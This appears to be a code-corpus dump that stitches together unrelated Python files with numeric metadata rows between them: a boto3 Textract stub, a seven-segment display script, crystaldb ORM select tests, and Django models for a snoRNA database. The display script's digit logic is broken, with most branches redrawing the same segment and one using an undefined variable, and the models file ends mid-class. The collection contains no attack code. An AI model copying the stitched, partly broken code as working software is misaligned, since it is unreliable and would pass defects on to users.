- **Warnings** *(list) --*
A list of warnings that occurred during the document text-detection operation.
- *(dict) --*
A warning about an issue that occurred during asynchronous text analysis ( StartDocumentAnalysis ) or asynchronous document-text detection ( StartDocumentTextDetection ).
- **ErrorCode** *(string) --*
The error code for the warning.
- **Pages** *(list) --*
A list of the pages that the warning applies to.
- *(integer) --*
- **StatusMessage** *(string) --*
The current status of an asynchronous document text-detection operation.
:type JobId: string
:param JobId: **[REQUIRED]**
A unique identifier for the text detection job. The ``JobId`` is returned from ``StartDocumentTextDetection`` .
:type MaxResults: integer
:param MaxResults:
The maximum number of results to return per paginated call. The largest value you can specify is 1,000. If you specify a value greater than 1,000, a maximum of 1,000 results is returned. The default value is 1,000.
:type NextToken: string
:param NextToken:
If the previous response was incomplete (because there are more blocks to retrieve), Amazon Textract returns a pagination token in the response. You can use this pagination token to retrieve the next set of blocks.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def start_document_analysis(self, DocumentLocation: Dict, FeatureTypes: List, ClientRequestToken: str = None, JobTag: str = None, NotificationChannel: Dict = None) -> Dict:
"""
Starts asynchronous analysis of an input document for relationships between detected items such as key and value pairs, tables, and selection elements.
``StartDocumentAnalysis`` can analyze text in documents that are in JPG, PNG, and PDF format. The documents are stored in an Amazon S3 bucket. Use DocumentLocation to specify the bucket name and file name of the document.
``StartDocumentAnalysis`` returns a job identifier (``JobId`` ) that you use to get the results of the operation. When text analysis is finished, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that you specify in ``NotificationChannel`` . To get the results of the text analysis operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call GetDocumentAnalysis , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentAnalysis`` .
For more information, see `Document Text Analysis <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-analyzing.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/StartDocumentAnalysis>`_
**Request Syntax**
::
response = client.start_document_analysis(
DocumentLocation={
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
},
FeatureTypes=[
'TABLES'|'FORMS',
],
ClientRequestToken='string',
JobTag='string',
NotificationChannel={
'SNSTopicArn': 'string',
'RoleArn': 'string'
}
)
**Response Syntax**
::
{
'JobId': 'string'
}
**Response Structure**
- *(dict) --*
- **JobId** *(string) --*
The identifier for the document text detection job. Use ``JobId`` to identify the job in a subsequent call to ``GetDocumentAnalysis`` .
:type DocumentLocation: dict
:param DocumentLocation: **[REQUIRED]**
The location of the document to be processed.
- **S3Object** *(dict) --*
The Amazon S3 bucket that contains the input document.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:type FeatureTypes: list
:param FeatureTypes: **[REQUIRED]**
A list of the types of analysis to perform. Add TABLES to the list to return information about the tables that are detected in the input document. Add FORMS to return detected fields and the associated text. To perform both types of analysis, add TABLES and FORMS to ``FeatureTypes`` . All selectable elements (``SELECTION_ELEMENT`` ) that are detected are returned, whatever the value of ``FeatureTypes`` .
- *(string) --*
:type ClientRequestToken: string
:param ClientRequestToken:
The idempotent token that you use to identify the start request. If you use the same token with multiple ``StartDocumentAnalysis`` requests, the same ``JobId`` is returned. Use ``ClientRequestToken`` to prevent the same job from being accidentally started more than once.
:type JobTag: string
:param JobTag:
An identifier you specify that\'s included in the completion notification that\'s published to the Amazon SNS topic. For example, you can use ``JobTag`` to identify the type of document, such as a tax form or a receipt, that the completion notification corresponds to.
:type NotificationChannel: dict
:param NotificationChannel:
The Amazon SNS topic ARN that you want Amazon Textract to publish the completion status of the operation to.
- **SNSTopicArn** *(string) --* **[REQUIRED]**
The Amazon SNS topic that Amazon Textract posts the completion status to.
- **RoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an IAM role that gives Amazon Textract publishing permissions to the Amazon SNS topic.
:rtype: dict
:returns:
"""
pass
def start_document_text_detection(self, DocumentLocation: Dict, ClientRequestToken: str = None, JobTag: str = None, NotificationChannel: Dict = None) -> Dict:
"""
Starts the asynchronous detection of text in a document. Amazon Textract can detect lines of text and the words that make up a line of text.
``StartDocumentTextDetection`` can analyze text in documents that are in JPG, PNG, and PDF format. The documents are stored in an Amazon S3 bucket. Use DocumentLocation to specify the bucket name and file name of the document.
``StartTextDetection`` returns a job identifier (``JobId`` ) that you use to get the results of the operation. When text detection is finished, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that you specify in ``NotificationChannel`` . To get the results of the text detection operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call GetDocumentTextDetection , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentTextDetection`` .
For more information, see `Document Text Detection <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-detecting.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/StartDocumentTextDetection>`_
**Request Syntax**
::
response = client.start_document_text_detection(
DocumentLocation={
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
},
ClientRequestToken='string',
JobTag='string',
NotificationChannel={
'SNSTopicArn': 'string',
'RoleArn': 'string'
}
)
**Response Syntax**
::
{
'JobId': 'string'
}
**Response Structure**
- *(dict) --*
- **JobId** *(string) --*
The identifier for the document text-detection job. Use ``JobId`` to identify the job in a subsequent call to ``GetDocumentTextDetection`` .
:type DocumentLocation: dict
:param DocumentLocation: **[REQUIRED]**
The location of the document to be processed.
- **S3Object** *(dict) --*
The Amazon S3 bucket that contains the input document.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:type ClientRequestToken: string
:param ClientRequestToken:
The idempotent token that\'s used to identify the start request. If you use the same token with multiple ``StartDocumentTextDetection`` requests, the same ``JobId`` is returned. Use ``ClientRequestToken`` to prevent the same job from being accidentally started more than once.
:type JobTag: string
:param JobTag:
An identifier you specify that\'s included in the completion notification that\'s published to the Amazon SNS topic. For example, you can use ``JobTag`` to identify the type of document, such as a tax form or a receipt, that the completion notification corresponds to.
:type NotificationChannel: dict
:param NotificationChannel:
The Amazon SNS topic ARN that you want Amazon Textract to publish the completion status of the operation to.
- **SNSTopicArn** *(string) --* **[REQUIRED]**
The Amazon SNS topic that Amazon Textract posts the completion status to.
- **RoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an IAM role that gives Amazon Textract publishing permissions to the Amazon SNS topic.
:rtype: dict
:returns:
"""
pass
| 75.56443 | 637 | 0.580579 | 8,281 | 70,955 | 4.959667 | 0.057723 | 0.013878 | 0.011784 | 0.01607 | 0.924521 | 0.920017 | 0.914684 | 0.914076 | 0.909766 | 0.901439 | 0 | 0.006669 | 0.336467 | 70,955 | 938 | 638 | 75.644989 | 0.865678 | 0.877669 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.357143 | false | 0.357143 | 0.25 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
8dcfbe5873235afd5a82c9e7335312bb694b7d74 | 3,621 | py | Python | seven.py | PUT-Motorsport/PUTM_EV_Dashboard | 3c9cada33c49b405cea309a2670681b14b8d0504 | [
"Apache-2.0"
] | null | null | null | seven.py | PUT-Motorsport/PUTM_EV_Dashboard | 3c9cada33c49b405cea309a2670681b14b8d0504 | [
"Apache-2.0"
] | null | null | null | seven.py | PUT-Motorsport/PUTM_EV_Dashboard | 3c9cada33c49b405cea309a2670681b14b8d0504 | [
"Apache-2.0"
] | null | null | null | from graphics import *
class horz_segment:
def __init__(self,x,y,w):
self.step = w/6
self.segment = Polygon(Point(x+self.step/2,y+self.step/2),Point(x+self.step,y+self.step),Point(x+self.step*4,y+self.step),
Point(x+self.step*4.5,y+self.step/2),Point(x+self.step*4,y),Point(x+self.step,y))
class vert_segment:
def __init__(self,x,y,w):
self.step = w/6
self.segment = Polygon(Point(x+self.step/2,y+self.step/2),Point(x+self.step,y+self.step),Point(x+self.step,y+4*self.step),
Point(x+self.step/2,y+self.step*4.5),Point(x,y+self.step*4),Point(x,y+self.step))
class number:
def __init__(self,x,y,w,win):
self.segments = [horz_segment(x,y,w),horz_segment(x,y+w*4/6,w),horz_segment(x,y+8/6*w,w),vert_segment(x,y,w),
vert_segment(x+4/6*w,y,w),vert_segment(x+4/6*w,y+4/6*w,w),vert_segment(x,y+4/6*w,w)]
for i in self.segments:
i.segment.setFill("white")
self.win = win
def display_number(self,x):
for i in self.segments:
i.segment.undraw()
if x==0:
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
elif x==1:
self.segments[4].segment.draw(self.win)
self.segments[5].segment.draw(self.win)
elif x==2:
self.segments[0].segment.draw(self.win)
self.segments[1].segment.draw(self.win)
self.segments[2].segment.draw(self.win)
self.segments[6].segment.draw(self.win)
self.segments[4].segment.draw(self.win)
elif x==3:
self.segments[0].segment.draw(self.win)
self.segments[1].segment.draw(self.win)
self.segments[2].segment.draw(self.win)
self.segments[4].segment.draw(self.win)
self.segments[5].segment.draw(self.win)
elif x==4:
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
elif x==5:
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
elif x==6:
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
elif x==7:
self.segments[4].segment.draw(self.win)
self.segments[5].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
elif x==8:
for i in self.segments:
i.segment.draw(win)
elif x==9:
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
| 44.703704 | 130 | 0.578569 | 554 | 3,621 | 3.741877 | 0.070397 | 0.272069 | 0.311143 | 0.373372 | 0.930053 | 0.885191 | 0.871201 | 0.81862 | 0.783406 | 0.766522 | 0 | 0.030134 | 0.257664 | 3,621 | 80 | 131 | 45.2625 | 0.741071 | 0 | 0 | 0.644737 | 0 | 0 | 0.001381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.013158 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5c3c51c70fa10006e7433831f898e112fd64be1e | 66 | py | Python | evolutionarystrategies/envs/__init__.py | ChristianIngwersen/BombermanRL | 6cad61708211d74fbc1e16776a579861b614f360 | [
"MIT"
] | null | null | null | evolutionarystrategies/envs/__init__.py | ChristianIngwersen/BombermanRL | 6cad61708211d74fbc1e16776a579861b614f360 | [
"MIT"
] | null | null | null | evolutionarystrategies/envs/__init__.py | ChristianIngwersen/BombermanRL | 6cad61708211d74fbc1e16776a579861b614f360 | [
"MIT"
] | 2 | 2019-11-28T16:21:09.000Z | 2021-05-26T12:14:38.000Z | from .make_env import make_vec_envs
from .make_env import make_env | 33 | 35 | 0.863636 | 13 | 66 | 4 | 0.461538 | 0.403846 | 0.423077 | 0.653846 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106061 | 66 | 2 | 36 | 33 | 0.881356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
3093eec30438f77933801111e3698db1e15c86a6 | 15,636 | py | Python | test/test_select.py | Geoge-Henry/crystaldb.py | cbc4430c8447bd978ea710f7e394f76696957b10 | [
"MIT"
] | 3 | 2018-10-08T02:15:04.000Z | 2019-04-02T07:09:00.000Z | test/test_select.py | CrystalSkyZ/tcsql | 897db00161955ae3e52f266507ee1922f185386a | [
"MIT"
] | 2 | 2019-04-26T11:02:32.000Z | 2020-09-01T08:14:32.000Z | test/test_select.py | CrystalSkyZ/tcsql | 897db00161955ae3e52f266507ee1922f185386a | [
"MIT"
] | 1 | 2019-09-11T03:11:17.000Z | 2019-09-11T03:11:17.000Z | # !/usr/bin/python
# -*- coding:utf-8 -*-
# Author: Zhichang Fu
# Created Time: 2019-01-29 21:33:24
import pytest
from .dbmodule import TestDB
class TestSelect(object):
"""
Table:
CREATE TABLE `user` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`gender` varchar(16) DEFAULT NULL,
`name` varchar(64) DEFAULT NULL,
`birthday` varchar(16) NOT NULL,
`age` int(11) unsigned NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `user_2` (
`id` int(11) unsigned NOT NULL DEFAULT '0',
`gender` varchar(16) CHARACTER SET utf8 DEFAULT NULL,
`name` varchar(64) CHARACTER SET utf8 DEFAULT NULL,
`birthday` varchar(16) CHARACTER SET utf8 NOT NULL,
`age` int(11) unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
"""
@pytest.fixture(scope="module")
def dbmodule(self):
return TestDB.db_handle()
@pytest.mark.skipif(False, reason="skipped")
def test_row_sql(self, dbmodule):
"""
SQL:
select * from user where id>80 and gender='girl';
"""
sql = """select * from user where id>=$id and gender=:gender """
sql = """select * from user where id>:id and gender=:gender"""
params = {"id": 80, "gender": "girl"}
result = dbmodule.query(sql, params)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_get(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.id = 80;
"""
result = dbmodule.select("user").get(id=80)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_get_some_field(self, dbmodule):
"""
SQL:
SELECT user.name, user.age FROM user WHERE user.id = 80;
"""
result = dbmodule.select("user", ["name", "age"]).get(id=80)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter(self, dbmodule):
"""
SQL:
SELECT user.name, user.age FROM user WHERE user.age = 36 \
AND user.gender = 'girl';
"""
result = dbmodule.select("user", ["name", "age"]).filter(
age=36, gender="girl").query() # query or all method
#result = dbmodule.select("user", ["name", "age"]).filter(
# age=36, gender="girl").all()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
print(dbmodule.get_debug_queries_info)
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_distinct(self, dbmodule):
"""
SQL:
SELECT DISTINCT user.name, user.age FROM user WHERE \
user.age = 36 AND user.gender = 'girl'
"""
result = dbmodule.select(
"user", ["name", "age"], distinct=True).filter(
age=36, gender="girl").query() # query or all method
#result = dbmodule.select("user", ["name", "age"], distinct=True).filter(
# age=36, gender="girl").all()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
print(dbmodule.get_debug_queries_info)
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter_dict(self, dbmodule):
"""
SQL:
SELECT user.name, user.age FROM user WHERE user.age = 36 \
AND user.gender = 'girl';
"""
condition = dict(age=36, gender="girl")
result = dbmodule.select("user",
["name", "age"]).filter(**condition).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter_lt_or_gt(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.age < 40 AND user.age > 35 AND user.id < 80 \
AND user.id > 60;
Grammar:
Support `lt`, `gt`, `lte`, `gte`, `eq` method.
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).lt(age=40).gt(
age=35).lt(id=80).gt(id=60).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter_between(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40 AND user.id BETWEEN 60 AND 80;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).between(id=[60, 80]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_count(self, dbmodule):
"""
SQL:
SELECT COUNT(*) AS COUNT FROM user WHERE user.gender = 'girl' \
AND user.age BETWEEN 35 AND 40;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).count()
assert result > 0
print(result)
@pytest.mark.skipif(False, reason="skipped")
def test_orm_distinct_count(self, dbmodule):
"""
SQL:
SELECT COUNT(DISTINCT user.name) AS COUNT FROM user \
WHERE user.gender = 'girl' AND user.age BETWEEN 35 AND 40;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).count(distinct="name")
assert result > 0
print(result)
@pytest.mark.skipif(False, reason="skipped")
def test_orm_first(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).first()
assert isinstance(result, dict)
print(result)
@pytest.mark.skipif(False, reason="skipped")
def test_orm_order_by(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.age BETWEEN 35 AND 40 ORDER BY user.age;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by("age").query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(True, reason="skipped")
def test_orm_order_by_list(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.age BETWEEN 35 AND 40 ORDER BY user.age, user.name;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by(["age", "name"]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_order_by_list_reversed(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40 ORDER BY user.age DESC , user.name DESC;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by(
["age", "name"], _reversed=True).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_order_by_list_complex(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40 ORDER BY user.age DESC, user. name ASC;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by("age DESC, name ASC").query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_in(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
IN (35, 36) AND user.id IN (80, 81, 82, 85);
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).in_(
age=[35, 36], id=[80, 81, 82, 85]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_not_in(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.id IN (80, 81, 82, 85) AND user.age NOT IN (35, 36);
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).in_(
id=[80, 81, 82, 85]).not_in(age=[35, 36]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_limit(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.id IN (80, 81, 82, 85) AND user.age \
NOT IN (35, 36) LIMIT 10;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).in_(
id=[80, 81, 82, 85]).not_in(age=[35, 36]).limit(10)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_inner_join(self, dbmodule):
"""
SQL:
SELECT user.name, user.age, user_2.name as name2, \
user_2.age as age2 FROM user INNER JOIN user_2 ON \
user_2.id = user.id WHERE user.gender = 'girl' \
AND user_2.gender = 'girl';
"""
condition = dict(gender="girl")
result = dbmodule.select(
"user", ["name", "age"]).filter(**condition).inner_join(
"user_2",
using="id",
fields=["name as name2", "age as age2"],
**condition).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_left_join(self, dbmodule):
"""
SQL:
SELECT user.name, user.age, user_2.name as name2, \
user_2.age as age2 FROM user LEFT JOIN user_2 ON \
user_2.id = user.id WHERE user.gender = 'girl' AND \
user_2.age = 35 AND user_2.gender = 'girl';
"""
condition1 = dict(gender="girl")
condition2 = dict(gender="girl", age=35)
result = dbmodule.select(
"user", ["name", "age"]).filter(**condition1).left_join(
"user_2",
using="id",
fields=["name as name2", "age as age2"],
**condition2).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_right_join(self, dbmodule):
"""
SQL:
SELECT user.name, user.age, user_2.name as name2, \
user_2.age as age2 FROM user RIGHT JOIN user_2 ON \
user_2.id = user.id WHERE user.gender = 'girl' AND \
user_2.age = 35 AND user_2.gender = 'girl';
"""
condition1 = dict(gender="girl")
condition2 = dict(gender="girl", age=35)
result = dbmodule.select(
"user", ["name", "age"]).filter(**condition1).right_join(
"user_2",
using="id",
fields=["name as name2", "age as age2"],
**condition2).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
print(dbmodule.get_debug_queries_info)
#print(result.list())
| 37.052133 | 81 | 0.5456 | 1,858 | 15,636 | 4.455867 | 0.075888 | 0.075734 | 0.053147 | 0.063776 | 0.909289 | 0.880179 | 0.863631 | 0.863631 | 0.843459 | 0.84044 | 0 | 0.028534 | 0.323101 | 15,636 | 421 | 82 | 37.140143 | 0.753685 | 0.351241 | 0 | 0.737557 | 0 | 0 | 0.065671 | 0 | 0 | 0 | 0 | 0 | 0.095023 | 1 | 0.099548 | false | 0 | 0.00905 | 0.004525 | 0.117647 | 0.271493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
309e2c38f4ddc6d31ce6f354903b11c97259a62a | 88,312 | py | Python | snorna/models.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | null | null | null | snorna/models.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2020-04-14T11:33:30.000Z | 2020-04-14T11:33:30.000Z | snorna/models.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2018-09-14T08:53:30.000Z | 2018-09-14T08:53:30.000Z | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class dataset(models.Model):
dataset_id = models.CharField(max_length=225, null=True)
source = models.CharField(max_length=225, null=True)
cancer_type = models.CharField(max_length=225, null=True)
dataset_description = models.CharField(max_length=225, null=True)
normal_n = models.IntegerField(null=True)
tumor_n = models.IntegerField(null=True)
build = models.CharField(max_length=225, null=True)
average_mappable_reads = models.IntegerField(null=True)
snorna_n = models.IntegerField(null=True)
snorna_rpkm_n = models.IntegerField(null=True)
def __str__(self):
return self.dataset_id
# clinical data
class clinical(models.Model):
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
time = models.IntegerField(null=True)
status = models.IntegerField(null=True)
subtype = models.CharField(max_length=225, null=True)
stage = models.CharField(max_length=225, null=True)
def __str_(self):
return self.dataset_id
class genomic_analysis(models.Model):
snorna = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225, null=True)
gene_expression = models.FloatField(null=True)
mirna_expression = models.FloatField(null=True)
cna = models.FloatField(null=True)
protein_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# clinical subtype for select
class clinical_subtype(models.Model):
dataset_id = models.CharField(max_length=225, null=True)
subtype = models.CharField(max_length=225, null=True)
state = models.CharField(max_length=225, null=True)
n = models.IntegerField(null=True)
def __str__(self):
return self.dataset_id
# protein_symvbol map
class rppa_name_symbol(models.Model):
protein = models.CharField(max_length = 225)
gene_symbol = models.CharField(max_length = 225)
def __str__(self):
return self.protein
# snorna info
class snorna_info(models.Model):
snorna = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=45, null=True)
strand = models.CharField(max_length=45, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
symbold = models.CharField(max_length=45, null=True)
type=models.CharField(max_length=45, null=True)
def __str__(self):
return self.snorna
class gene_symbol_info(models.Model):
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.gene_symbol
# snorna_expression
class snorna_expression(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id_expression = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# mrna_expression
class mrna_expression(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# cnv
class cnv(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
# methylation
class methylation(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
